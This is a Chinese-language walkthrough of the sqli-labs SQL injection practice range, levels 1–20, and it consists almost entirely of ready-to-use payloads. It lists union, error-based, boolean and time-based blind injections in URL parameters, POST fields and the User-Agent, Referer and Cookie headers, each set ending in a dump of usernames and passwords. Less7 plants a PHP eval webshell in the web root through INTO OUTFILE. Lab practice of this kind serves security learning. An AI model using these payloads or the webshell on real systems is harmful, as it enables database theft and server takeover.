sqli-labs靶场通关技巧（1-20）

Less1

注入步骤：

在参数后面加上单引号，数据库报错，说明存在注入

id=1' and 1=1--+，返回正常

id=1' and 1=2--+，返回数据为空，说明这是个基于单引号的字符型注入

用二分法逐步判断字段数，此处有3个字段：id=1' order by 3--+

确定回显点：id=-1' union select 1,2,3--+（参数1改成数据库不存在的值，如0或者负数）

 

暴库payload：

id=-1' union select 1,2,database()--+

 

暴表payload：

id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

 

暴字段payload：

id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

 

暴用户名和密码的值payload：

id=-1' union select 1,2,group_concat(username,'-',password) from security.users--+

 

Less2

数字型注入：?id=1 and 1=1--+

暴库payload：?id=-1 union select 1,2,database()--+

暴表payload：id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

暴字段payload：id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

暴值payload：id=-1 union select 1,2,group_concat(username,'-',password) from security.users--+

 

Less3

基于’)的字符型注入：id=1') and 1=1--+

暴库payload：id=-1') union select 1,2,database()--+

暴表payload：id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

暴字段payload：id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

暴值payload：id=-1') union select 1,2,group_concat(username,'-',password) from security.users--+

 

Less4

基于”)的字符型注入：id=1”) and 1=1--+

暴库payload：id=-1") union select 1,2,database()--+

暴表payload：id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

暴字段payload：id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

暴值payload：id=-1") union select 1,2,group_concat(username,'-',password) from security.users--+

 

Less5

基于’字符型的报错注入

暴库payload：id=1' union select updatexml(1,concat(0x7e,(database()),0x7e),1)--+

暴表payload：id=1' union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

暴字段payload：id=1' union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+

暴值payload：id=1' union select updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1)--+

 

Less6

基于”字符型的报错注入

暴库payload：id=1” union select updatexml(1,concat(0x7e,(database()),0x7e),1)--+

暴表payload：id=1" union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

暴字段payload：id=1" union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+

暴值payload：id=1" union select updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1)--+

 

Less7

写入一句话木马：

id=1')) union select 1,'2','<?php @eval($_POST["a"]);?>' into outfile 'D:\\phpstudy\\WWW\\1.php' --+

 

蚁剑连接：

 

Less8

基于’字符型的布尔盲注

判断数据库名长度：id=1' and length(database())>7--+

暴库payload：id=1' and ascii(substr(database(),1,1))>100--+

暴表payload：id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

暴字段payload：id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100--+

暴值payload：id=1' and ascii(substr((select password from security.users limit 0,1),1,1))>100--+

 

Less9

基于’字符型的时间盲注

判断数据库名长度：id=1' and if(length(database())>7, 0, sleep(5))--+

暴库payload：id=1' and if(ascii(substr(database(),1,1))>100, 0, sleep(5))--+

暴表payload：id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0, sleep(5))--+

暴字段payload：id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100, 0, sleep(5))--+

暴值payload：id=1' and if(ascii(substr((select password from security.users limit 0,1),1,1))>100, 0, sleep(5))--+

 

Less10

基于”字符型的时间盲注

判断数据库名长度：id=1" and if(length(database())>8, 0, sleep(5))--+

暴库payload：id=1" and if(ascii(substr(database(),1,1))>100, 0, sleep(5))--+

暴表payload：id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0, sleep(5))--+

暴字段payload：id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100, 0, sleep(5))--+

暴值payload：id=1" and if(ascii(substr((select password from security.users limit 0,1),1,1))>100, 0, sleep(5))--+

 

Less11

基于’的POST型注入

暴库payload：-admin' union select 1,database()-- -

暴表payload：-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'-- -

暴字段payload：-admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'-- -

暴值payload：-admin' union select 1,group_concat(username,'-',password) from security.users-- -

 

Less12

基于”)的POST型注入

暴库payload：-admin") union select 1,database()-- -

暴表payload：-admin") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'-- -

暴字段payload：-admin") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'-- -

暴值payload：-admin") union select 1,group_concat(username,'-',password) from security.users-- -

 

Less13

基于’)的报错注入

暴库：admin') union select updatexml(1,concat(0x7e,(database()),0x7e),1) -- -

暴表payload：admin') union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)-- -

暴字段payload：admin') union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)-- -

暴值payload：admin') union select updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1)-- -

 

Less14

基于”的报错注入

暴库：admin" union select updatexml(1,concat(0x7e,(database()),0x7e),1) -- -

暴表payload：admin" union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)-- -

暴字段payload：admin" union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)-- -

暴值payload：admin" union select updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1)-- -

 

Less15

基于’的POST型时间/布尔盲注

判断数据库名长度：admin' and if(length(database())>7, 0, sleep(5))-- -

暴库payload：admin' and if(ascii(substr(database(),1,1))>100, 0, sleep(5))-- -

暴表payload：admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0, sleep(5))-- -

暴字段payload：admin' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100, 0, sleep(5))-- -

暴值payload：admin' and if(ascii(substr((select password from security.users limit 0,1),1,1))>100, 0, sleep(5))-- -

 

Less16

基于")的POST型时间/布尔盲注

判断数据库名长度：admin") and if(length(database())>8, 0, sleep(5))-- -

暴库payload：admin") and if(ascii(substr(database(),1,1))>100, 0, sleep(5))-- -

暴表payload：admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0, sleep(5))-- -

暴字段payload：admin") and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100, 0, sleep(5))-- -

暴值payload：admin") and if(ascii(substr((select password from security.users limit 0,1),1,1))>100, 0, sleep(5))-- -

 

Less17

基于’的POST型报错注入

 

暴库：admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -

暴表payload：admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)-- -

暴字段payload：admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)-- -

暴值payload：admin' and  updatexml(1,concat(0x7e,(select password from (select password from users where username='admin') mingzi ),0x7e),1)-- -

 

Less18

基于’的User-Agent:报头文报错注入

用Burp Suite抓取输入正确用户密码的登录页面,然后在报头文User-Agent:后加入注入语句

暴库Payload：',1,updatexml(1,concat(0x7e, database(),0x7e),1))#

爆表payload：',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#

爆字段payload：',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#

爆值payload：',1,updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1))#

 

Less19

基于’的Referer:报头文报错注入

用Burp Suite抓取输入正确用户密码的登录页面,然后在报头文Referer:后加入注入语句

暴库Payload：',1,updatexml(1,concat(0x7e, database(),0x7e),1))#

爆表payload：',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#

爆字段payload：',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#

爆值payload：',1,updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1))#

 

Less20

基于’的Cookie:报头文报错注入

用Burp Suite抓取输入正确用户密码的登录页面,然后在报头文Cookie:后加入注入语句

暴库Payload： uname=-admin' union select 1,2,database()--+

爆表payload：uname=-admin' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

爆字段payload：uname=-admin' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

爆值payload：uname=-admin' union select 1,2,group_concat(username,'-',password) from security.users--+

 

总结

Less1-4有回显，用联合查询注入可以显示数据库信息

Less5-6 利用报错注入，将数据库信息显示出来

Less7直接写入一句话木马，用菜刀或蚁剑连接

Less8-10 布尔/时间盲注，需要逐个字符猜解，结合burpsuite暴力破解更方便

Less11-17 POST型注入，在用户名或密码后面拼接注入语句

Less18-20 POST头部报错注入，在相应的头部信息后面拼接注入语句

 

参考链接：https://blog.csdn.net/weixin_45728976/article/details/103932264

参考链接：https://blog.csdn.net/qq_41420747/article/details/81836327?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase#less-15%C2%A0POST%20-%20Blind-%20Boolian%2Ftime%20Based%20-%20Single%20quotes%20(%E5%9F%BA%E4%BA%8Ebool%E5%9E%8B%2F%E6%97%B6%E9%97%B4%E5%BB%B6%E8%BF%9F%E5%8D%95%E5%BC%95%E5%8F%B7POST%E5%9E%8B%E7%9B%B2%E6%B3%A8)